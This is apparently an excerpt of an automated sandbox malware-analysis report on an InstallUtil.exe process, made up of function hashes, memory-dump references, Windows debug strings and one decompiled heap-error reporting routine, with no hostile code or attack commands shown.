Instruction Fuzzy Hash: 05A00239E18356CBFB981A21B11E22829919707F21F06047B7D0BA2281DD7D8C41C696

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0325C1A0 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313455669.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_CSA73881.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d6093e3630517dd5b783aa4659c6c873df399b3dcca5e833ee8beb37353160
Instruction ID: 0140191c056f35749c7d951e4aa85ae942251e6b4848e9cc6f8215a3c6c8df45
Opcode Fuzzy Hash: f3d6093e3630517dd5b783aa4659c6c873df399b3dcca5e833ee8beb37353160
Instruction Fuzzy Hash: 0CA14036E2071ACFCF05DFA5C84459EBBB2FF85300B15816AE805AB221EB71AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallUtil.exePID: 5408, Parent PID: 5724COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	50.8%
Total number of Nodes:	1645
Total number of Limit Nodes:	68

Executed Functions

Function 01309910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0130991A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab45ba730c31f6730565f6361b3b5bc5a15cc66223aa17b94cc4d591747a1440
Instruction ID: 4935cff62c0d82f4e51dbd3bce572dc85b56fb538f9ac060f89cef0604d00e2e
Opcode Fuzzy Hash: ab45ba730c31f6730565f6361b3b5bc5a15cc66223aa17b94cc4d591747a1440
Instruction Fuzzy Hash: B59002B520101402D544719944087460405A7D1345F51C421A5054554EC6998DE976A5

Uniqueness

Uniqueness Score: -1.00%

Function 013099A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 013099AA

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e238b7b305a7d27610656a67559fc5053596cb7487b0d723fa28590ac2d97a7
Instruction ID: c9471c65e6e8de01020d064b801053794dc4009ec935e558bd2104258e15336a
Opcode Fuzzy Hash: 8e238b7b305a7d27610656a67559fc5053596cb7487b0d723fa28590ac2d97a7
Instruction Fuzzy Hash: B09002A534101442D50461994418B060405E7E2345F51C425E1054554DC659CC667166

Uniqueness

Uniqueness Score: -1.00%

Function 01309860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0130986A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e8cd7e671dada42f699ebf01746dac9fce5b2867d479b45a68595a1e9d00b6e
Instruction ID: ecf3e0788161dce5c1d54887323297376642b264a466029f50d11e28135d75bd
Opcode Fuzzy Hash: 9e8cd7e671dada42f699ebf01746dac9fce5b2867d479b45a68595a1e9d00b6e
Instruction Fuzzy Hash: D690027520101413D515619945087070409A7D1385F91C822A0414558DD6968966B161

Uniqueness

Uniqueness Score: -1.00%

Function 01309840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0130984A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b43e966779c4978ef7e6a3097ccf941a5adaf7749c10b162a7de40974ca04ff8
Instruction ID: da4f58e1cb56ed39cfb257d3e26916432b76b5695d0d00ae007912033f8ef272
Opcode Fuzzy Hash: b43e966779c4978ef7e6a3097ccf941a5adaf7749c10b162a7de40974ca04ff8
Instruction Fuzzy Hash: B9900265242051529949B19944085074406B7E1385791C422A1404950CC566986AE661

Uniqueness

Uniqueness Score: -1.00%

Function 013098F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 013098FA

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb265aeaac6c69a3be3d43aee3b85a3b96c9560c42e539d8015657b00b813be2
Instruction ID: 770f924125ce15a41c92fffb5d3af0c94e85fd906fd83fc06f68f4384783e142
Opcode Fuzzy Hash: bb265aeaac6c69a3be3d43aee3b85a3b96c9560c42e539d8015657b00b813be2
Instruction Fuzzy Hash: 0790026560101502D50571994408616040AA7D1385F91C432A1014555ECA6589A6B171

Uniqueness

Uniqueness Score: -1.00%

Function 01309A20 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01309A2A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb92479ac3519fcc902f1095b50a700f16586d8eb5fa863f727639a93febff98
Instruction ID: f7fbc8b2e56b04014338f5246fd7812deed6cf5b1d3d680267d15a836d4f61ad
Opcode Fuzzy Hash: bb92479ac3519fcc902f1095b50a700f16586d8eb5fa863f727639a93febff98
Instruction Fuzzy Hash: 9B90026560101042854471A988489064405BBE2355751C531A0988550DC599887966A5

Uniqueness

Uniqueness Score: -1.00%

Function 01309A00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01309A0A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27cca0cdf5b2e5f71c3452811acad3e94db56f8f641ed07cdc9c13a8f81d275c
Instruction ID: 10d58bfe2a335f36574a22a6bf7f1ed556a5bb44e3a020be838e1c251337b78a
Opcode Fuzzy Hash: 27cca0cdf5b2e5f71c3452811acad3e94db56f8f641ed07cdc9c13a8f81d275c
Instruction Fuzzy Hash: 7C90027520141402D5046199481870B0405A7D1346F51C421A1154555DC665886575B1

Uniqueness

Uniqueness Score: -1.00%

Function 01309A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01309A5A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 108b334eda297416109b666c3af08ed069c1af36a79b0e3160c27d5bd35484f7
Instruction ID: 640d80eab98b7a5b4424fdae78683efac084a6d2020a9ad3ea913f4d5d49ded2
Opcode Fuzzy Hash: 108b334eda297416109b666c3af08ed069c1af36a79b0e3160c27d5bd35484f7
Instruction Fuzzy Hash: 7590026521181042D60465A94C18B070405A7D1347F51C525A0144554CC95588756561

Uniqueness

Uniqueness Score: -1.00%

Function 01309540 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0130954A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1268d9a620011ef2b6355f517d64872cfec363137e1fc995458878ec4bfab17e
Instruction ID: d2ff1311c5012e7e5124ed1e515783ed012ebbb8b9c0029d0c961e5b377699c6
Opcode Fuzzy Hash: 1268d9a620011ef2b6355f517d64872cfec363137e1fc995458878ec4bfab17e
Instruction Fuzzy Hash: C2900269211010034509A59907085070446A7D6395351C431F1005550CD66188756161

Uniqueness

Uniqueness Score: -1.00%

Function 013095D0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 013095DA

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4aed993f579bbef05ae86ac073da23a825a2158fb813128a00732a68537d4d8b
Instruction ID: 5ced99b8795b7791aa4775b72501d7ed1f61858d68bc2f6bd04966312a08aa84
Opcode Fuzzy Hash: 4aed993f579bbef05ae86ac073da23a825a2158fb813128a00732a68537d4d8b
Instruction Fuzzy Hash: 119002A520201003850971994418616440AA7E1345B51C431E1004590DC56588A57165

Uniqueness

Uniqueness Score: -1.00%

Function 01309710 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0130971A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 781efb220e11c4440a0dbbf00eb5cc57ec73f8872ed9625f1c96c8ce856f8a76
Instruction ID: 50783b5418e46876434d1b56449dfbbf83d5b8a342ae0e0bb01ff8fb360e0f01
Opcode Fuzzy Hash: 781efb220e11c4440a0dbbf00eb5cc57ec73f8872ed9625f1c96c8ce856f8a76
Instruction Fuzzy Hash: 1890027520101402D50465D9540C6460405A7E1345F51D421A5014555EC6A588A57171

Uniqueness

Uniqueness Score: -1.00%

Function 013097A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 013097AA

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d82197ad8ddcef329342bcc0e2c2d88023282c850eb06103ae29ca16ea3835fc
Instruction ID: 609e1568ce0a2cedff4256c9c1cb17e40a344e1b1a881603840df8ef429e3a8a
Opcode Fuzzy Hash: d82197ad8ddcef329342bcc0e2c2d88023282c850eb06103ae29ca16ea3835fc
Instruction Fuzzy Hash: 0E90026530101003D5447199541C6064405F7E2345F51D421E0404554CD955886A6262

Uniqueness

Uniqueness Score: -1.00%

Function 01309780 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0130978A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a1ff2301e0154ab56922d3c15fa419b2785f8c8ad48b408f5603a8903aa3735
Instruction ID: 0f8db3cdaecb84cda6a2991bb57641b8617a19b83743b9fc5247ddf976638637
Opcode Fuzzy Hash: 0a1ff2301e0154ab56922d3c15fa419b2785f8c8ad48b408f5603a8903aa3735
Instruction Fuzzy Hash: 4490026D21301002D5847199540C60A0405A7D2346F91D825A0005558CC955887D6361

Uniqueness

Uniqueness Score: -1.00%

Function 01309660 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0130966A

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3809fa3a08659f36797bad978c2bdc5a5b3feefc11f922c2f9af2199c50c57ce
Instruction ID: f1aaae4b251fd128faa08e02ddf29b3756141bda1435a690caa38b0067dff4d2
Opcode Fuzzy Hash: 3809fa3a08659f36797bad978c2bdc5a5b3feefc11f922c2f9af2199c50c57ce
Instruction Fuzzy Hash: 3A90027520101802D5847199440864A0405A7D2345F91C425A0015654DCA558A6D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 013096E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 013096EA

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2d71ec65ce84dca68444f1c874d65a96381d7642b89c0b117ba5dade106ae539
Instruction ID: 1969cbcc8e18bb81fb26a6ad11b84510f144fe977bdf5a56f09e86b686002dee
Opcode Fuzzy Hash: 2d71ec65ce84dca68444f1c874d65a96381d7642b89c0b117ba5dade106ae539
Instruction Fuzzy Hash: 8490027520109802D5146199840874A0405A7D1345F55C821A4414658DC6D588A57161

Uniqueness

Uniqueness Score: -1.00%

Function 0130967A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01309694

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87bc257be6869c6e75247f8f71785c2d832cf8b870735d2748443ebee3dc4fe8
Instruction ID: 03f95bed409d2391035d7022dfed3e44ee075b89d0461e7556e859117b60b546
Opcode Fuzzy Hash: 87bc257be6869c6e75247f8f71785c2d832cf8b870735d2748443ebee3dc4fe8
Instruction Fuzzy Hash: ABB02B718010C4C6DA02D3A00A0C7173D0077C0318F12C061D1020240F8338C090F2B1

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1A0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.470291183.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_41f000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2059d30526379246035844a62210ccccf078bb989da545bc7f174f0b00cc021
Instruction ID: bf268d91f619938eb03b39c7895fca664e884f2412e91478f794490b2a2455dc
Opcode Fuzzy Hash: e2059d30526379246035844a62210ccccf078bb989da545bc7f174f0b00cc021
Instruction Fuzzy Hash: 71A022A8C0830C03002030FA2A03023B38CC000008F0003EAAE8C022023C02AC3200EB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0137B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0137B305
*** Inpage error in %ws:%s, xrefs: 0137B418
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0137B53F
The resource is owned shared by %d threads, xrefs: 0137B37E
*** An Access Violation occurred in %ws:%s, xrefs: 0137B48F
*** enter .cxr %p for the context, xrefs: 0137B50D
*** then kb to get the faulting stack, xrefs: 0137B51C
a NULL pointer, xrefs: 0137B4E0
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0137B323
The resource is owned exclusively by thread %p, xrefs: 0137B374
write to, xrefs: 0137B4A6
Go determine why that thread has not released the critical section., xrefs: 0137B3C5
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0137B2F3
The instruction at %p referenced memory at %p., xrefs: 0137B432
an invalid address, %p, xrefs: 0137B4CF
*** Resource timeout (%p) in %ws:%s, xrefs: 0137B352
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0137B314
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0137B476
This failed because of error %Ix., xrefs: 0137B446
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0137B38F
*** enter .exr %p for the exception record, xrefs: 0137B4F1
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0137B39B
The critical section is owned by thread %p., xrefs: 0137B3B9
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0137B2DC
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0137B47D
The instruction at %p tried to %s , xrefs: 0137B4B6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0137B484
<unknown>, xrefs: 0137B27E, 0137B2D1, 0137B350, 0137B399, 0137B417, 0137B48E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0137B3D6
read from, xrefs: 0137B4AD, 0137B4B2

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 25e775b97c1be21e2d5c8e67af58cd3790de7cf250ac19dd0b49a7bf20b1a029
Instruction ID: 2a638ba4d6c96480741bb1ae0ce68c547315659cb19bfc5a0ac9e80a84521f5b
Opcode Fuzzy Hash: 25e775b97c1be21e2d5c8e67af58cd3790de7cf250ac19dd0b49a7bf20b1a029
Instruction Fuzzy Hash: 5F810235A50204FFEB356A4A8C85EEB7F3AEF56B9DF410048F9052B116D369A441CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 01381C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01381C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012CB150();
				} else {
					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x13b589c);
				E012CB150("Heap error detected at %p (heap handle %p)\n",  *0x13b58a0);
				_t27 =  *0x13b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01381E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012CB150();
				} else {
					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E012CB150("Error code: %d - %s\n",  *0x13b5898);
				_t113 =  *0x13b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012CB150("Parameter1: %p\n",  *0x13b58a4);
				}
				_t115 =  *0x13b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012CB150("Parameter2: %p\n",  *0x13b58a8);
				}
				_t117 =  *0x13b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012CB150("Parameter3: %p\n",  *0x13b58ac);
				}
				_t119 =  *0x13b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13b58b4);
					E012CB150("Last known valid blocks: before - %p, after - %p\n",  *0x13b58b0);
				} else {
					_t120 =  *0x13b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012CB150();
				} else {
					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E012CB150("Stack trace available at %p\n", 0x13b58c0);
			}

0x01381c10
0x01381c16
0x01381c1e
0x01381c3d
0x01381c3e
0x01381c20
0x01381c35
0x01381c3a
0x01381c44
0x01381c55
0x01381c5a
0x01381c65
0x01381c67
0x00000000
0x01381c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01381c67
0x01381cdc
0x01381ce5
0x01381d04
0x01381d05
0x01381ce7
0x01381cfc
0x01381d01
0x01381d0b
0x01381d17
0x01381d1f
0x01381d25
0x01381d30
0x01381d4f
0x01381d50
0x01381d32
0x01381d47
0x01381d4c
0x01381d61
0x01381d67
0x01381d68
0x01381d6e
0x01381d79
